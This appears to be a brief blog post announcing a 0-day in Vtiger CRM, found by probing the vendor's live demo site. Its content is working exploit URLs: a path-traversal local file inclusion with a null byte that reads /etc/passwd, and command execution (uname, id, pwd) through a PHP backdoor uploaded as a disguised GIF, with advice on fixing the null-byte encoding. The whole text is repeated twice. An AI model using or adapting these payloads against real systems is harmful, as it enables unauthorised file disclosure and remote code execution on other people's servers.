Vtiger CRM Exploit ( 0-day )
Vtiger CRM is 100% Open Source Customer Relationship Management solution built over LAMP/WAMP stack and other third-party open source packages. I made a quick run-through on their demo site and discovered some stuff.You need to be authenticated first.
LFI
http://en.vtiger.com/index.php?action=../../../../../../../../etc/passwd% 00&module=Home
Command Execution
First, upload a php backdoor disguised as a valid picture file. And then...
http://en.vtiger.com/index.php?cmd=uname%20-a;id;pwd&action=../../storage/2008/February/
week1/31361_kidlat.gif% 00&module=Home
I did not install the software and I stopped when I reached this point so I wasn't able to find all the bugs =)
[there sould be no space between % and 00 in the url, can't post it as such here coz blogger's stripping them out]
LFI
http://en.vtiger.com/index.php?action=../../../../../../../../etc/passwd% 00&module=Home
Command Execution
First, upload a php backdoor disguised as a valid picture file. And then...
http://en.vtiger.com/index.php?cmd=uname%20-a;id;pwd&action=../../storage/2008/February/
week1/31361_kidlat.gif% 00&module=Home
I did not install the software and I stopped when I reached this point so I wasn't able to find all the bugs =)
[there sould be no space between % and 00 in the url, can't post it as such here coz blogger's stripping them out]
